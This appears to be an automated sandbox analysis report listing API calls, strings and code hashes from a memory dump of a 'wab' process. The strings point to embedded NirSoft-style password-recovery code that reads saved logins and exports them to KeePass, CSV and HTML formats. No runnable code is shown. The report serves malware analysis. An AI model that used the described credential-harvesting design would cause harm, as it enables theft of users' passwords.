  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
• String ID: logins$null
• API String ID: 3492182834-2163367763
• Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
• Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
• Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
• Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT ref: 004086DB
• _mbscpy.MSVCRT ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
• Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
• Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
• Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
• Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• ??3@YAXPAX@Z.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• ??3@YAXPAX@Z.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• ??3@YAXPAX@Z.MSVCRT ref: 00418716
• ??3@YAXPAX@Z.MSVCRT ref: 0041872A
• ??3@YAXPAX@Z.MSVCRT ref: 00418749
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??3@$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 4233704886-1717621600
• Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
• Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
• Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
• Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
• Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
• Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
• Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
• Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
• Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
• Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
• Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
• Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT ref: 0041234D
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
• Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
• Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
• Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
• Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
• Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
• memcpy.MSVCRT ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction Fuzzy Hash: F331C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
• Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
• Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
• Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
• Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                              • memcpy.MSVCRT ref: 00413A1B
                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 4173585201-1821301763
                                                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy
                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                              • API String ID: 1284135714-318151290
                                                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 4066108131-3849865405
                                                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • memset.MSVCRT ref: 00408362
                                                                                              • memset.MSVCRT ref: 00408377
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 290601579-0
                                                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memchrmemset
                                                                                              • String ID: PD$PD
                                                                                              • API String ID: 1581201632-2312785699
                                                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                              • String ID:
